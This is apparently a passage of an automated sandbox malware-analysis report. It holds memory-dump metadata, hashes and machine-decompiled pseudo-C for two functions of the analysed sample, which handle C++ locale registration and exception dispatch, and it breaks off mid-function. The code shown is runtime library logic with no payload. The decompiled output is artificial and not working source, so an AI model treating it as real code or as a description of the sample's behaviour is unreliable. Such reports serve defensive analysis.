                                                                                                                                                                          0x00a095b2
                                                                                                                                                                          0x00a09509
                                                                                                                                                                          0x00a0950c
                                                                                                                                                                          0x00a09513
                                                                                                                                                                          0x00a09518
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00a0951e
                                                                                                                                                                          0x00a09521
                                                                                                                                                                          0x00a09527
                                                                                                                                                                          0x00a09529
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00a0952b
                                                                                                                                                                          0x00a0952f
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00a09543
                                                                                                                                                                          0x00a09549
                                                                                                                                                                          0x00a0954b
                                                                                                                                                                          0x00a0956f
                                                                                                                                                                          0x00a09572
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00a09572
                                                                                                                                                                          0x00a0954d
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00a093db
                                                                                                                                                                          0x00a093e0
                                                                                                                                                                          0x00a093eb
                                                                                                                                                                          0x00a0955a
                                                                                                                                                                          0x00a0955a
                                                                                                                                                                          0x00a0955a
                                                                                                                                                                          0x00a0955d
                                                                                                                                                                          0x00a0955e
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00a09566
                                                                                                                                                                          0x00a093d9
                                                                                                                                                                          0x00a093a8
                                                                                                                                                                          0x00a09353
                                                                                                                                                                          0x00a09356
                                                                                                                                                                          0x00a0936a
                                                                                                                                                                          0x00a0936c
                                                                                                                                                                          0x00a0938d
                                                                                                                                                                          0x00a09390
                                                                                                                                                                          0x00a09393
                                                                                                                                                                          0x00a09396
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00a09396
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00a09358
                                                                                                                                                                          0x00a09358
                                                                                                                                                                          0x00a0935b
                                                                                                                                                                          0x00a0935e
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00a0935e
                                                                                                                                                                          0x00a09356
                                                                                                                                                                          0x00a0930b
                                                                                                                                                                          0x00a09310
                                                                                                                                                                          0x00a09318
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00a092a8
                                                                                                                                                                          0x00a092ad
                                                                                                                                                                          0x00a092b0
                                                                                                                                                                          0x00a092b5
                                                                                                                                                                          0x00a0963f
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00a0963f

                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.312867160.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.312856202.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.312888799.0000000000A14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.312904957.0000000000A22000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.312912092.0000000000A23000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.312935306.0000000000A47000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_9f0000_file.jbxd
                                                                                                                                                                          Yara matches
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 0-3907804496
                                                                                                                                                                          • Opcode ID: db6e47204a6323553b390d9189332b26478030e68b227dc0401c61af6ed84b58
                                                                                                                                                                          • Instruction ID: 1b0861fe419275ece3e0ba1eb76a61ba0bd233db824abd8ec9c4c364eeca7e91
                                                                                                                                                                          • Opcode Fuzzy Hash: db6e47204a6323553b390d9189332b26478030e68b227dc0401c61af6ed84b58
                                                                                                                                                                          • Instruction Fuzzy Hash: EBC1E074E0420D9FDF11DF99E890BAEBBB0AF8A310F004059E545AB2D3C732A946CF21
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Function 009F16F0 Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 144COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          C-Code - Quality: 70%
                                                                                                                                                                          			E009F16F0(void* __ebx) {
				void* __edi;
				void* __esi;
				signed int _t61;
				signed int _t68;
				intOrPtr* _t73;
				signed int _t74;
				intOrPtr _t86;
				short _t87;
				char _t89;
				char _t90;
				void* _t91;
				signed int _t96;
				signed int _t97;
				signed char _t99;
				signed int _t101;
				intOrPtr _t106;
				signed int _t110;
				signed int _t111;
				signed int _t112;
				void* _t117;
				intOrPtr* _t119;
				signed int _t121;
				signed int _t123;
				void* _t124;
				intOrPtr* _t129;
				signed int _t131;
				signed int _t132;
				signed int _t134;
				intOrPtr _t137;
				signed int _t140;
				intOrPtr _t141;
				void* _t143;
				void* _t144;
				void* _t146;
				void* _t147;
				void* _t151;

				_t144 = _t143 - 0x94;
				_push(__ebx);
				_t99 = 0;
				 *((intOrPtr*)(_t144 + 0x14)) = 0;
				E009F6A1B(_t144 + 0x10, 0);
				_t121 =  *0xa45aa4; // 0x3
				_t137 =  *0xa45ab0; // 0xb839b0
				if(_t121 == 0) {
					E009F6A1B(_t144 + 0x18, _t121);
					_t151 =  *0xa45aa4 - _t99; // 0x3
					if(_t151 == 0) {
						_t96 =  *0xa45b80; // 0x3
						_t97 = _t96 + 1;
						 *0xa45b80 = _t97;
						 *0xa45aa4 = _t97;
					}
					E009F6A73(_t144 + 0x14);
					_t121 =  *0xa45aa4; // 0x3
				}
				_t106 =  *((intOrPtr*)( *((intOrPtr*)(_t144 + 0xa8)) + 4));
				if(_t121 >=  *((intOrPtr*)(_t106 + 0xc))) {
					_t129 = 0;
					__eflags = 0;
					goto L8;
				} else {
					_t129 =  *((intOrPtr*)( *((intOrPtr*)(_t106 + 8)) + _t121 * 4));
					if(_t129 != 0) {
						L27:
						E009F6A73(_t144 + 0x10);
						return _t129;
					} else {
						L8:
						if( *((intOrPtr*)(_t106 + 0x14)) == _t99) {
							L11:
							if(_t129 != 0) {
								goto L27;
							} else {
								goto L12;
							}
						} else {
							_t91 = E009F6D92();
							if(_t121 >=  *((intOrPtr*)(_t91 + 0xc))) {
								L12:
								if(_t137 == 0) {
									_push(0x18);
									_t131 = E009F89CD(__eflags);
									_t146 = _t144 + 4;
									__eflags = _t131;
									if(_t131 == 0) {
										_t129 = 0;
										__eflags = 0;
										goto L24;
									} else {
										_t110 =  *( *((intOrPtr*)(_t146 + 0xa8)) + 4);
										__eflags = _t110;
										if(_t110 == 0) {
											_t61 = 0xa1424c;
										} else {
											_t61 =  *(_t110 + 0x18);
											__eflags = _t61;
											if(_t61 == 0) {
												_t61 = _t110 + 0x1c;
											}
										}
										_push(_t61);
										_t111 = _t146 + 0x1c;
										E009F19A0(_t99, _t111);
										 *(_t131 + 4) = _t99;
										 *_t131 = 0xa14af4;
										E009FE149(_t117);
										E009F7116(__eflags, _t146 + 0x4c);
										 *(_t131 + 8) = _t99;
										 *(_t131 + 0x10) = _t99;
										 *(_t131 + 0x14) = _t99;
										E009F7116(__eflags, _t146 + 0x7c);
										_push(1);
										_push(1);
										_t68 = E009FCC76();
										_t147 = _t146 + 0x10;
										__eflags = _t68;
										if(__eflags == 0) {
											E009F6B85(__eflags);
											goto L29;
										} else {
											_push(1);
											_push(6);
											 *_t68 = _t99;
											 *(_t131 + 8) = _t68;
											_t111 = E009FCC76();
											_t147 = _t147 + 8;
											__eflags = _t111;
											if(__eflags == 0) {
												L29:
												E009F6B85(__eflags);
												goto L30;
											} else {
												_t86 =  *((intOrPtr*)("false")); // 0x736c6166
												 *_t111 = _t86;
												_t87 =  *0xa142cc; // 0x65
												_push(1);
												_push(5);
												 *((short*)(_t111 + 4)) = _t87;
												 *(_t131 + 0x10) = _t111;
												_t111 = E009FCC76();
												_t147 = _t147 + 8;
												__eflags = _t111;
												if(__eflags == 0) {
													L30:
													E009F6B85(__eflags);
													asm("int3");
													asm("int3");
													asm("int3");
													asm("int3");
													asm("int3");
													_push(_t99);
													_t101 =  *(_t147 + 8);
													_push(_t121);
													_t123 = _t111;
													 *_t123 = 0;
													 *(_t123 + 0x10) = 0;
													 *((intOrPtr*)(_t123 + 0x14)) = 0xf;
													__eflags = _t101 - 0xf;
													if(_t101 > 0xf) {
														__eflags = _t101 - 0x7fffffff;
														if(__eflags > 0) {
															E009F4070(_t101, _t117, _t123, _t131, __eflags);
															asm("int3");
															asm("int3");
															asm("int3");
															asm("int3");
															_t119 =  *((intOrPtr*)(_t147 + 4));
															_t73 = _t119;
															_push(_t131);
															_t132 = _t111;
															_push(_t123);
															_t124 = _t73 + 1;
															 *_t132 = 0;
															 *(_t132 + 0x10) = 0;
															 *((intOrPtr*)(_t132 + 0x14)) = 0xf;
															do {
																_t112 =  *_t73;
																_t73 = _t73 + 1;
																__eflags = _t112;
															} while (_t112 != 0);
															_t74 = _t73 - _t124;
															__eflags = _t74;
															_push(_t74);
															_push(_t119);
															E009F4430(_t101, _t132, _t119, _t124, _t132);
															return _t132;
														} else {
															_push(_t137);
															_t140 = _t101 | 0x0000000f;
															_push(_t131);
															__eflags = _t140 - 0x7fffffff;
															if(_t140 <= 0x7fffffff) {
																__eflags = _t140 - 0x16;
																_t141 =  <  ? 0x16 : _t140;
															} else {
																_t141 = 0x7fffffff;
															}
															_push(_t141 + 1);
															_t134 = E009F4090(_t101, _t117, _t123, _t131);
															 *(_t123 + 0x10) = _t101;
															 *((intOrPtr*)(_t123 + 0x14)) = _t141;
															E009FA270(_t123, _t134,  *((char*)(_t147 + 0x18)), _t101);
															 *((char*)(_t134 + _t101)) = 0;
															 *_t123 = _t134;
															return _t123;
														}
													} else {
														 *(_t123 + 0x10) = _t101;
														E009FA270(_t123, _t123,  *((char*)(_t147 + 0x10)), _t101);
														 *((char*)(_t101 + _t123)) = 0;
														return _t123;
													}
												} else {
													_t89 = "true"; // 0x65757274
													_t99 = 1;
													 *_t111 = _t89;
													_t90 =  *0xa142d4; // 0x0
													 *((char*)(_t111 + 4)) = _t90;
													 *(_t131 + 0x14) = _t111;
													 *((short*)(_t131 + 0xc)) = 0x2c2e;
													L24:
													__eflags = _t99 & 0x00000001;
													if(__eflags != 0) {
														E009F2E10(_t146 + 0x18, _t129);
													}
													E009F6D66(__eflags, _t129);
													_t144 = _t146 + 4;
													 *((intOrPtr*)( *_t129 + 4))();
													 *0xa45ab0 = _t129;
													goto L27;
												}
											}
										}
									}
								} else {
									_t129 = _t137;
									goto L27;
								}
							} else {
								_t129 =  *((intOrPtr*)( *((intOrPtr*)(_t91 + 8)) + _t121 * 4));
								goto L11;
							}
						}
					}
				}
			}







































                                                                                                                                                                          0x009f16f0
                                                                                                                                                                          0x009f16f6
                                                                                                                                                                          0x009f16fa
                                                                                                                                                                          0x009f1701
                                                                                                                                                                          0x009f1705
                                                                                                                                                                          0x009f170a
                                                                                                                                                                          0x009f1710
                                                                                                                                                                          0x009f1718
                                                                                                                                                                          0x009f171f
                                                                                                                                                                          0x009f1724
                                                                                                                                                                          0x009f172a
                                                                                                                                                                          0x009f172c
                                                                                                                                                                          0x009f1731
                                                                                                                                                                          0x009f1732
                                                                                                                                                                          0x009f1737
                                                                                                                                                                          0x009f1737
                                                                                                                                                                          0x009f1740
                                                                                                                                                                          0x009f1745
                                                                                                                                                                          0x009f1745
                                                                                                                                                                          0x009f1752
                                                                                                                                                                          0x009f1758
                                                                                                                                                                          0x009f176a
                                                                                                                                                                          0x009f176a
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x009f175a
                                                                                                                                                                          0x009f175d
                                                                                                                                                                          0x009f1762
                                                                                                                                                                          0x009f1896
                                                                                                                                                                          0x009f189a
                                                                                                                                                                          0x009f18ab
                                                                                                                                                                          0x009f1768
                                                                                                                                                                          0x009f176c
                                                                                                                                                                          0x009f176f
                                                                                                                                                                          0x009f1781
                                                                                                                                                                          0x009f1783
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x009f1771
                                                                                                                                                                          0x009f1771
                                                                                                                                                                          0x009f1779
                                                                                                                                                                          0x009f1789
                                                                                                                                                                          0x009f178b
                                                                                                                                                                          0x009f1794
                                                                                                                                                                          0x009f179b
                                                                                                                                                                          0x009f179d
                                                                                                                                                                          0x009f17a0
                                                                                                                                                                          0x009f17a2
                                                                                                                                                                          0x009f1870
                                                                                                                                                                          0x009f1870
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x009f17a8
                                                                                                                                                                          0x009f17af
                                                                                                                                                                          0x009f17b2
                                                                                                                                                                          0x009f17b4
                                                                                                                                                                          0x009f17c2
                                                                                                                                                                          0x009f17b6
                                                                                                                                                                          0x009f17b6
                                                                                                                                                                          0x009f17b9
                                                                                                                                                                          0x009f17bb
                                                                                                                                                                          0x009f17bd
                                                                                                                                                                          0x009f17bd
                                                                                                                                                                          0x009f17bb
                                                                                                                                                                          0x009f17c7
                                                                                                                                                                          0x009f17c8
                                                                                                                                                                          0x009f17cc
                                                                                                                                                                          0x009f17d1
                                                                                                                                                                          0x009f17d4
                                                                                                                                                                          0x009f17da
                                                                                                                                                                          0x009f17e4
                                                                                                                                                                          0x009f17ed
                                                                                                                                                                          0x009f17f1
                                                                                                                                                                          0x009f17f4
                                                                                                                                                                          0x009f17f7
                                                                                                                                                                          0x009f17fc
                                                                                                                                                                          0x009f17fe
                                                                                                                                                                          0x009f1800
                                                                                                                                                                          0x009f1805
                                                                                                                                                                          0x009f1808
                                                                                                                                                                          0x009f180a
                                                                                                                                                                          0x009f18ac
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x009f1810
                                                                                                                                                                          0x009f1810
                                                                                                                                                                          0x009f1812
                                                                                                                                                                          0x009f1814
                                                                                                                                                                          0x009f1816
                                                                                                                                                                          0x009f181e
                                                                                                                                                                          0x009f1820
                                                                                                                                                                          0x009f1823
                                                                                                                                                                          0x009f1825
                                                                                                                                                                          0x009f18b1
                                                                                                                                                                          0x009f18b1
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x009f182b
                                                                                                                                                                          0x009f182b
                                                                                                                                                                          0x009f1830
                                                                                                                                                                          0x009f1832
                                                                                                                                                                          0x009f1838
                                                                                                                                                                          0x009f183a
                                                                                                                                                                          0x009f183c
                                                                                                                                                                          0x009f1840
                                                                                                                                                                          0x009f1848
                                                                                                                                                                          0x009f184a
                                                                                                                                                                          0x009f184d
                                                                                                                                                                          0x009f184f
                                                                                                                                                                          0x009f18b6
                                                                                                                                                                          0x009f18b6
                                                                                                                                                                          0x009f18bb
                                                                                                                                                                          0x009f18bc
                                                                                                                                                                          0x009f18bd
                                                                                                                                                                          0x009f18be
                                                                                                                                                                          0x009f18bf
                                                                                                                                                                          0x009f18c0
                                                                                                                                                                          0x009f18c1
                                                                                                                                                                          0x009f18c5
                                                                                                                                                                          0x009f18c6
                                                                                                                                                                          0x009f18c8
                                                                                                                                                                          0x009f18ce
                                                                                                                                                                          0x009f18d5
                                                                                                                                                                          0x009f18dc
                                                                                                                                                                          0x009f18df
                                                                                                                                                                          0x009f18ff
                                                                                                                                                                          0x009f1905
                                                                                                                                                                          0x009f1957
                                                                                                                                                                          0x009f195c
                                                                                                                                                                          0x009f195d
                                                                                                                                                                          0x009f195e
                                                                                                                                                                          0x009f195f
                                                                                                                                                                          0x009f1960
                                                                                                                                                                          0x009f1964
                                                                                                                                                                          0x009f1966
                                                                                                                                                                          0x009f1967
                                                                                                                                                                          0x009f1969
                                                                                                                                                                          0x009f196a
                                                                                                                                                                          0x009f196d
                                                                                                                                                                          0x009f1973
                                                                                                                                                                          0x009f197a
                                                                                                                                                                          0x009f1981
                                                                                                                                                                          0x009f1981
                                                                                                                                                                          0x009f1983
                                                                                                                                                                          0x009f1984
                                                                                                                                                                          0x009f1984
                                                                                                                                                                          0x009f1988
                                                                                                                                                                          0x009f1988
                                                                                                                                                                          0x009f198c
                                                                                                                                                                          0x009f198d
                                                                                                                                                                          0x009f198e
                                                                                                                                                                          0x009f1997
                                                                                                                                                                          0x009f1907
                                                                                                                                                                          0x009f1907
                                                                                                                                                                          0x009f190a
                                                                                                                                                                          0x009f190d
                                                                                                                                                                          0x009f190e
                                                                                                                                                                          0x009f1914
                                                                                                                                                                          0x009f1922
                                                                                                                                                                          0x009f1924
                                                                                                                                                                          0x009f1916
                                                                                                                                                                          0x009f1916
                                                                                                                                                                          0x009f1916
                                                                                                                                                                          0x009f192a
                                                                                                                                                                          0x009f1935
                                                                                                                                                                          0x009f193a
                                                                                                                                                                          0x009f193d
                                                                                                                                                                          0x009f1940
                                                                                                                                                                          0x009f1948
                                                                                                                                                                          0x009f194c
                                                                                                                                                                          0x009f1954
                                                                                                                                                                          0x009f1954
                                                                                                                                                                          0x009f18e1
                                                                                                                                                                          0x009f18e9
                                                                                                                                                                          0x009f18ec
                                                                                                                                                                          0x009f18f4
                                                                                                                                                                          0x009f18fc
                                                                                                                                                                          0x009f18fc
                                                                                                                                                                          0x009f1851
                                                                                                                                                                          0x009f1851
                                                                                                                                                                          0x009f1856
                                                                                                                                                                          0x009f185b
                                                                                                                                                                          0x009f185d
                                                                                                                                                                          0x009f1862
                                                                                                                                                                          0x009f1865
                                                                                                                                                                          0x009f1868
                                                                                                                                                                          0x009f1872
                                                                                                                                                                          0x009f1872
                                                                                                                                                                          0x009f1875
                                                                                                                                                                          0x009f187b
                                                                                                                                                                          0x009f187b
                                                                                                                                                                          0x009f1881
                                                                                                                                                                          0x009f1888
                                                                                                                                                                          0x009f188d
                                                                                                                                                                          0x009f1890
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x009f1890
                                                                                                                                                                          0x009f184f
                                                                                                                                                                          0x009f1825
                                                                                                                                                                          0x009f180a
                                                                                                                                                                          0x009f178d
                                                                                                                                                                          0x009f178d
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x009f178d
                                                                                                                                                                          0x009f177b
                                                                                                                                                                          0x009f177e
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x009f177e
                                                                                                                                                                          0x009f1779
                                                                                                                                                                          0x009f176f
                                                                                                                                                                          0x009f1762

                                                                                                                                                                          APIs
                                                                                                                                                                          • std::_Lockit::_Lockit.LIBCPMT ref: 009F1705
                                                                                                                                                                          • std::_Lockit::_Lockit.LIBCPMT ref: 009F171F
                                                                                                                                                                          • std::_Lockit::~_Lockit.LIBCPMT ref: 009F1740
                                                                                                                                                                          • std::_Facet_Register.LIBCPMT ref: 009F1881
                                                                                                                                                                          • std::_Lockit::~_Lockit.LIBCPMT ref: 009F189A
                                                                                                                                                                          • Concurrency::cancel_current_task.LIBCPMT ref: 009F18AC
                                                                                                                                                                          • Concurrency::cancel_current_task.LIBCPMT ref: 009F18B1
                                                                                                                                                                          • Concurrency::cancel_current_task.LIBCPMT ref: 009F18B6
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.312867160.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.312856202.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.312888799.0000000000A14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.312904957.0000000000A22000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.312912092.0000000000A23000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.312935306.0000000000A47000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_9f0000_file.jbxd
                                                                                                                                                                          Yara matches
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: std::_$Lockit$Concurrency::cancel_current_task$Lockit::_Lockit::~_$Facet_Register
                                                                                                                                                                          • String ID: false$true
                                                                                                                                                                          • API String ID: 3742692055-2658103896
                                                                                                                                                                          • Opcode ID: 5e444d2ca80ddf5d21390ed5448f83705501cd42ff7d6f7d4c69caeb19f5e9b0
                                                                                                                                                                          • Instruction ID: d90ad16370293e9325c872d6e2c3cf164284332953871ff382b60266b5dbd59e
                                                                                                                                                                          • Opcode Fuzzy Hash: 5e444d2ca80ddf5d21390ed5448f83705501cd42ff7d6f7d4c69caeb19f5e9b0
                                                                                                                                                                          • Instruction Fuzzy Hash: C551F378A04309CFC724EF64D981B7A77E4AF81750F14892DEA498B252DB32EC46CBC1
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Function 009FBA58 Relevance: 16.1, APIs: 6, Strings: 3, Instructions: 304COMMONLIBRARYCODE
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          C-Code - Quality: 72%
                                                                                                                                                                          			E009FBA58(signed int __edx, signed char* _a4, signed int _a8, signed int _a12, char _a16, signed int* _a20, signed int _a24, signed int _a28, signed int _a32) {
				signed char* _v0;
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				intOrPtr _v24;
				char _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				intOrPtr _v48;
				signed int _v52;
				intOrPtr _v56;
				intOrPtr _v60;
				void _v64;
				signed int _v68;
				char _v84;
				intOrPtr _v88;
				signed int _v92;
				intOrPtr _v100;
				void _v104;
				intOrPtr* _v112;
				signed char* _v184;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				void* _t202;
				signed int _t203;
				char _t204;
				signed int _t206;
				signed int _t208;
				signed char* _t209;
				signed int _t210;
				signed int _t211;
				signed int _t215;
				void* _t218;
				signed char* _t221;
				void* _t223;
				void* _t225;
				signed char _t229;
				signed int _t230;
				void* _t232;
				void* _t235;
				void* _t238;
				signed char _t245;
				signed int _t250;
				void* _t253;
				signed int* _t255;
				signed int _t256;
				intOrPtr _t257;
				signed int _t258;
				void* _t263;
				void* _t268;
				void* _t269;
				signed int _t273;
				signed char* _t274;
				intOrPtr* _t275;
				signed char _t276;
				signed int _t277;
				signed int _t278;
				intOrPtr* _t280;
				signed int _t281;
				signed int _t282;
				signed int _t287;
				signed int _t294;
				signed int _t295;
				signed int _t298;
				signed int _t300;
				signed char* _t301;
				signed int _t302;
				signed int _t303;
				signed int* _t305;
				signed char* _t308;
				signed int _t318;
				signed int _t319;
				signed int _t321;
				signed int _t330;
				void* _t332;
				void* _t334;
				void* _t335;
				void* _t336;
				void* _t337;

				_t300 = __edx;
				_push(_t319);
				_t305 = _a20;
				_v20 = 0;
				_v28 = 0;
				_t279 = E009FC9B8(_a8, _a16, _t305);
				_t335 = _t334 + 0xc;
				_v12 = _t279;
				if(_t279 < 0xffffffff || _t279 >= _t305[1]) {
					L66:
					_t202 = E00A007E9(_t274, _t279, _t300, _t305, _t319);
					asm("int3");
					_t332 = _t335;
					_t336 = _t335 - 0x38;
					_push(_t274);
					_t275 = _v112;
					__eflags =  *_t275 - 0x80000003;
					if( *_t275 == 0x80000003) {
						return _t202;
					} else {
						_t203 = E009FB6DC(_t275, _t279, _t300, _t305, _t319, _t305, _t319);
						__eflags =  *(_t203 + 8);
						if( *(_t203 + 8) != 0) {
							__imp__EncodePointer(0);
							_t319 = _t203;
							_t223 = E009FB6DC(_t275, _t279, _t300, 0, _t319);
							__eflags =  *((intOrPtr*)(_t223 + 8)) - _t319;
							if( *((intOrPtr*)(_t223 + 8)) != _t319) {
								__eflags =  *_t275 - 0xe0434f4d;
								if( *_t275 != 0xe0434f4d) {
									__eflags =  *_t275 - 0xe0434352;
									if( *_t275 != 0xe0434352) {
										_t215 = E009F99F8(_t300, 0, _t319, _t275, _a4, _a8, _a12, _a16, _a24, _a28);
										_t336 = _t336 + 0x1c;
										__eflags = _t215;
										if(_t215 != 0) {
											L83:
											return _t215;
										}
									}
								}
							}
						}
						_t204 = _a16;
						_v28 = _t204;
						_v24 = 0;
						__eflags =  *(_t204 + 0xc);
						if( *(_t204 + 0xc) > 0) {
							_push(_a24);
							E009F992B(_t275, _t279, 0, _t319,  &_v44,  &_v28, _a20, _a12, _t204);
							_t302 = _v40;
							_t337 = _t336 + 0x18;
							_t215 = _v44;
							_v20 = _t215;
							_v12 = _t302;
							__eflags = _t302 - _v32;
							if(_t302 >= _v32) {
								goto L83;
							}
							_t281 = _t302 * 0x14;
							__eflags = _t281;
							_v16 = _t281;
							do {
								_t282 = 5;
								_t218 = memcpy( &_v64,  *((intOrPtr*)( *_t215 + 0x10)) + _t281, _t282 << 2);
								_t337 = _t337 + 0xc;
								__eflags = _v64 - _t218;
								if(_v64 > _t218) {
									goto L82;
								}
								__eflags = _t218 - _v60;
								if(_t218 > _v60) {
									goto L82;
								}
								_t221 = _v48 + 0xfffffff0 + (_v52 << 4);
								_t287 = _t221[4];
								__eflags = _t287;
								if(_t287 == 0) {
									L80:
									__eflags =  *_t221 & 0x00000040;
									if(( *_t221 & 0x00000040) == 0) {
										_push(0);
										_push(1);
										E009FB9D8(_t302, _t275, _a4, _a8, _a12, _a16, _t221, 0,  &_v64, _a24, _a28);
										_t302 = _v12;
										_t337 = _t337 + 0x30;
									}
									goto L82;
								}
								__eflags =  *((char*)(_t287 + 8));
								if( *((char*)(_t287 + 8)) != 0) {
									goto L82;
								}
								goto L80;
								L82:
								_t302 = _t302 + 1;
								_t215 = _v20;
								_t281 = _v16 + 0x14;
								_v12 = _t302;
								_v16 = _t281;
								__eflags = _t302 - _v32;
							} while (_t302 < _v32);
							goto L83;
						}
						E00A007E9(_t275, _t279, _t300, 0, _t319);
						asm("int3");
						_push(_t332);
						_t301 = _v184;
						_push(_t275);
						_push(_t319);
						_push(0);
						_t206 = _t301[4];
						__eflags = _t206;
						if(_t206 == 0) {
							L108:
							_t208 = 1;
							__eflags = 1;
						} else {
							_t280 = _t206 + 8;
							__eflags =  *_t280;
							if( *_t280 == 0) {
								goto L108;
							} else {
								__eflags =  *_t301 & 0x00000080;
								_t308 = _v0;
								if(( *_t301 & 0x00000080) == 0) {
									L90:
									_t276 = _t308[4];
									_t321 = 0;
									__eflags = _t206 - _t276;
									if(_t206 == _t276) {
										L100:
										__eflags =  *_t308 & 0x00000002;
										if(( *_t308 & 0x00000002) == 0) {
											L102:
											_t209 = _a4;
											__eflags =  *_t209 & 0x00000001;
											if(( *_t209 & 0x00000001) == 0) {
												L104:
												__eflags =  *_t209 & 0x00000002;
												if(( *_t209 & 0x00000002) == 0) {
													L106:
													_t321 = 1;
													__eflags = 1;
												} else {
													__eflags =  *_t301 & 0x00000002;
													if(( *_t301 & 0x00000002) != 0) {
														goto L106;
													}
												}
											} else {
												__eflags =  *_t301 & 0x00000001;
												if(( *_t301 & 0x00000001) != 0) {
													goto L104;
												}
											}
										} else {
											__eflags =  *_t301 & 0x00000008;
											if(( *_t301 & 0x00000008) != 0) {
												goto L102;
											}
										}
										_t208 = _t321;
									} else {
										_t185 = _t276 + 8; // 0x6e
										_t210 = _t185;
										while(1) {
											_t277 =  *_t280;
											__eflags = _t277 -  *_t210;
											if(_t277 !=  *_t210) {
												break;
											}
											__eflags = _t277;
											if(_t277 == 0) {
												L96:
												_t211 = _t321;
											} else {
												_t278 =  *((intOrPtr*)(_t280 + 1));
												__eflags = _t278 -  *((intOrPtr*)(_t210 + 1));
												if(_t278 !=  *((intOrPtr*)(_t210 + 1))) {
													break;
												} else {
													_t280 = _t280 + 2;
													_t210 = _t210 + 2;
													__eflags = _t278;
													if(_t278 != 0) {
														continue;
													} else {
														goto L96;
													}
												}
											}
											L98:
											__eflags = _t211;
											if(_t211 == 0) {
												goto L100;
											} else {
												_t208 = 0;
											}
											goto L109;
										}
										asm("sbb eax, eax");
										_t211 = _t210 | 0x00000001;
										__eflags = _t211;
										goto L98;
									}
								} else {
									__eflags =  *_t308 & 0x00000010;
									if(( *_t308 & 0x00000010) != 0) {
										goto L108;
									} else {
										goto L90;
									}
								}
							}
						}
						L109:
						return _t208;
					}
				} else {
					_t274 = _a4;
					if( *_t274 != 0xe06d7363 || _t274[0x10] != 3 || _t274[0x14] != 0x19930520 && _t274[0x14] != 0x19930521 && _t274[0x14] != 0x19930522) {
						L22:
						_t300 = _a12;
						_v8 = _t300;
						goto L24;
					} else {
						_t319 = 0;
						if(_t274[0x1c] != 0) {
							goto L22;
						} else {
							_t225 = E009FB6DC(_t274, _t279, _t300, _t305, 0);
							if( *((intOrPtr*)(_t225 + 0x10)) == 0) {
								L60:
								return _t225;
							} else {
								_t274 =  *(E009FB6DC(_t274, _t279, _t300, _t305, 0) + 0x10);
								_t263 = E009FB6DC(_t274, _t279, _t300, _t305, 0);
								_v28 = 1;
								_v8 =  *((intOrPtr*)(_t263 + 0x14));
								if(_t274 == 0 ||  *_t274 == 0xe06d7363 && _t274[0x10] == 3 && (_t274[0x14] == 0x19930520 || _t274[0x14] == 0x19930521 || _t274[0x14] == 0x19930522) && _t274[0x1c] == _t319) {
									goto L66;
								} else {
									if( *((intOrPtr*)(E009FB6DC(_t274, _t279, _t300, _t305, _t319) + 0x1c)) == _t319) {
										L23:
										_t300 = _v8;
										_t279 = _v12;
										L24:
										_v52 = _t305;
										_v48 = 0;
										__eflags =  *_t274 - 0xe06d7363;
										if( *_t274 != 0xe06d7363) {
											L56:
											__eflags = _t305[3];
											if(_t305[3] <= 0) {
